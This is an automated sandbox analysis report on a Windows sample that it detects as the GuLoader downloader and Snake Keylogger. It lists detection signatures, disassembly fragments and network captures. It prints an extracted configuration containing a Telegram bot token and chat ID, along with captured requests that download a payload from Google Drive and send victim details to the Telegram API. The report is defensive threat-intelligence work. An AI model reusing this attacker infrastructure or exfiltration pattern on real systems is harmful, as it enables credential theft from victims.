Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fa24c148.exe

Overview

General Information

Sample name:Fa24c148.exe
Analysis ID:1543766
MD5:7644ebbf786053ffaf95dbe86b7de5d4
SHA1:5d563fb10f6d71049ae5f69fb6ccb9f2217ddf32
SHA256:0b7ba80811d300aefe42de77b7b8fb2d5b6f9a8d4f2cf3d1213b6fead5efb59b
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Fa24c148.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\Fa24c148.exe" MD5: 7644EBBF786053FFAF95DBE86B7DE5D4)
    • Fa24c148.exe (PID: 1440 cmdline: "C:\Users\user\Desktop\Fa24c148.exe" MD5: 7644EBBF786053FFAF95DBE86B7DE5D4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "8148338634:AAFvLNrhxaF7bMPzQMLbUnueRMJvDIi5kcU", "Chat_id": "7698865320", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.2029869938.0000000005425000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: Fa24c148.exe PID: 1440JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Fa24c148.exe PID: 1440JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-28T12:22:37.535463+010028033053Unknown Traffic192.168.2.449740188.114.97.3443TCP
            2024-10-28T12:22:42.712859+010028033053Unknown Traffic192.168.2.449746188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-28T12:22:34.997069+010028032742Potentially Bad Traffic192.168.2.449738132.226.247.7380TCP
            2024-10-28T12:22:36.809593+010028032742Potentially Bad Traffic192.168.2.449738132.226.247.7380TCP
            2024-10-28T12:22:38.465929+010028032742Potentially Bad Traffic192.168.2.449741132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-28T12:22:28.723071+010028032702Potentially Bad Traffic192.168.2.449736142.250.185.206443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8148338634:AAFvLNrhxaF7bMPzQMLbUnueRMJvDIi5kcU", "Chat_id": "7698865320", "Version": "4.4"}
            Source: Fa24c148.exeReversingLabs: Detection: 15%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E687A8 CryptUnprotectData,4_2_35E687A8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_35E68EF1 CryptUnprotectData,4_2_35E68EF1
            Source: Fa24c148.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055FF
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_004060BA FindFirstFileW,FindClose,0_2_004060BA
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_00402770 FindFirstFileW,4_2_00402770
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004055FF
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_004060BA FindFirstFileW,FindClose,4_2_004060BA
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 0016F45Dh4_2_0016F2C0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 0016F45Dh4_2_0016F4AC
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 0016F45Dh4_2_0016F52F
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 0016FC19h4_2_0016F961
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35782C19h4_2_35782968
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 357831E0h4_2_35782DC8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 3578E0A9h4_2_3578DE00
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 3578D7F9h4_2_3578D550
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 357831E0h4_2_3578310E
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 357831E0h4_2_35782DB8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 3578DC51h4_2_3578D9A8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_35780040
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 3578FAB9h4_2_3578F810
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 3578D3A1h4_2_3578D0F8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 3578CF49h4_2_3578CCA0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 3578F209h4_2_3578EF60
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35780D0Dh4_2_35780B30
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35781697h4_2_35780B30
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 3578EDB1h4_2_3578EB08
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 3578F661h4_2_3578F3B8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 3578E501h4_2_3578E258
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 3578E959h4_2_3578E6B0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E69280h4_2_35E68FB0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E67EB5h4_2_35E67B78
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6CCB6h4_2_35E6C9E8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E618A1h4_2_35E615F8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6ECA6h4_2_35E6E9D8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E65E81h4_2_35E65BD8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E61449h4_2_35E611A0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6BA76h4_2_35E6B7A8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E62E59h4_2_35E62BB0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E65A29h4_2_35E65780
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6FA56h4_2_35E6F788
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6DA66h4_2_35E6D798
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E60FF1h4_2_35E60D48
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6E816h4_2_35E6E548
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6C826h4_2_35E6C558
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E62A01h4_2_35E62758
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E679C9h4_2_35E67720
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E655D1h4_2_35E65328
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E625A9h4_2_35E62300
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6D5D6h4_2_35E6D308
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6B5E6h4_2_35E6B318
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E60B99h4_2_35E608F0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6F5C6h4_2_35E6F2F8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6C396h4_2_35E6C0C8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E67571h4_2_35E672C8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E65179h4_2_35E64ED0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E62151h4_2_35E61EA8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6E386h4_2_35E6E0B8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then mov esp, ebp4_2_35E6B081
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E66733h4_2_35E66488
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E60741h4_2_35E60498
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E63709h4_2_35E63460
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6F136h4_2_35E6EE68
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E67119h4_2_35E66E70
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6D146h4_2_35E6CE78
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E64D21h4_2_35E64A78
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E602E9h4_2_35E60040
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E61CF9h4_2_35E61A50
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E648C9h4_2_35E64620
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6DEF6h4_2_35E6DC28
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E662D9h4_2_35E66030
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E6BF06h4_2_35E6BC38
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E632B1h4_2_35E63008
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 35E66CC1h4_2_35E66A18
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B6970h4_2_367B6678
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B4746h4_2_367B4478
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BD768h4_2_367BD470
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BAC60h4_2_367BA968
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B0C2Eh4_2_367B0960
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B8158h4_2_367B7E60
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B3E26h4_2_367B3B58
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BEF50h4_2_367BEC58
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BC448h4_2_367BC150
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B5E16h4_2_367B5B48
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B9940h4_2_367B9648
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B030Eh4_2_367B0040
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B6E38h4_2_367B6B40
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B3506h4_2_367B3238
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BDC30h4_2_367BD938
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BB128h4_2_367BAE30
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B54F6h4_2_367B5228
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B8620h4_2_367B8328
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BF418h4_2_367BF120
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B2BE6h4_2_367B2918
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BC910h4_2_367BC618
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B19DEh4_2_367B1710
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B9E08h4_2_367B9B10
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B4BD7h4_2_367B4908
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B7300h4_2_367B7008
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BE0F8h4_2_367BDE00
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B22C6h4_2_367B1FF8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BB5F0h4_2_367BB2F8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B10BEh4_2_367B0DF0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B8AE8h4_2_367B87F0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B42B6h4_2_367B3FE8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BF8E0h4_2_367BF5E8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BCDD8h4_2_367BCAE0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B6347h4_2_367B5FD8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BA2D0h4_2_367B9FD8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B079Eh4_2_367B04D0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B77C8h4_2_367B74D0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BE5C0h4_2_367BE2C8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BBAB8h4_2_367BB7C0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B5986h4_2_367B56B8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B8FB0h4_2_367B8CB8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BFDA8h4_2_367BFAB0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B3076h4_2_367B2DA8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BD2A0h4_2_367BCFA8
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B1E47h4_2_367B1BA0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BA798h4_2_367BA4A0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B5066h4_2_367B4D98
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B7C90h4_2_367B7998
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BEA88h4_2_367BE790
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B2756h4_2_367B2488
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367BBF80h4_2_367BBC88
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B154Eh4_2_367B1280
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367B9478h4_2_367B9180
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367F1FE8h4_2_367F1CF0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367F0CC8h4_2_367F09D0
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367F0338h4_2_367F0040
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367F1B20h4_2_367F1828
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367F1190h4_2_367F0E98
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367F1658h4_2_367F1360
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then jmp 367F0801h4_2_367F0508
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36833E70
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36833E60
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36830A10
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_368308DE
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_36830960

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2028/10/2024%20/%2022:44:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 142.250.185.206:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
